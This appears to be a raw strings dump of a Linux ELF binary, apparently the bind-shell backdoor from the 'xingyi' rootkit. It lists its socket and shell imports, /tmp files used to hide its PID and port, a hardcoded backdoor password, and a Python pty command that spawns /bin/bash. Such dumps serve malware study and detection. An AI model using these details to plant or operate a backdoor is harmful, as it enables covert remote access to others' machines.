/lib64/ld-linux-x86-64.so.2
libc.so.6
socket
fflush
exit
htons
fopen
fork
__stack_chk_fail
putchar
listen
popen
getpid
fgets
strlen
send
memset
strstr
bind
read
dup2
stdout
fclose
setsockopt
malloc
bzero
system
fwrite
fprintf
accept
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-`!`
UH-`!`
[]A\A]A^A_
/tmp/xingyi_reverse_pid
/tmp/xingyi_bindshell_pid
/tmp/xingyi_reverse_port
/tmp/xingyi_bindshell_port
sw0rdm4n
Password :
Wrong password
python --version
not found
Warning ! failed to hide pid ! check your write file permission !
Warning ! failed to hide port ! check your write file permission !
Socket error  ! exit ! 
Failed to setsockopt for reuseaddr ! 
Bind failed ! exit ! 
Listen failed ! exit ! 
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/bash
;*3$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
xingyi_bindshell.c
n_malloc
_write_pid_to_file
_log_file
bindshell_password
rootshell_password
BACKLOG.3865
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
stdout@@GLIBC_2.2.5
data_start
log_bind_pid
setsockopt@@GLIBC_2.2.5
write@@GLIBC_2.2.5
getpid@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
daemonize
bind_port
_fini
strlen@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
htons@@GLIBC_2.2.5
dup2@@GLIBC_2.2.5
send@@GLIBC_2.2.5
memset@@GLIBC_2.2.5
reverse_shell_port
close@@GLIBC_2.2.5
read@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
fgets@@GLIBC_2.2.5
__data_start
strcmp@@GLIBC_2.2.5
fprintf@@GLIBC_2.2.5
__gmon_start__
__dso_handle
log_reverse_port
_IO_stdin_used
__libc_csu_init
malloc@@GLIBC_2.2.5
fflush@@GLIBC_2.2.5
listen@@GLIBC_2.2.5
_end
_start
__bss_start
log_bind_port
main
bind@@GLIBC_2.2.5
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
bzero@@GLIBC_2.2.5
_Jv_RegisterClasses
accept@@GLIBC_2.2.5
exit@@GLIBC_2.2.5
fwrite@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
_init
fork@@GLIBC_2.2.5
strstr@@GLIBC_2.2.5
log_reverse_pid
socket@@GLIBC_2.2.5
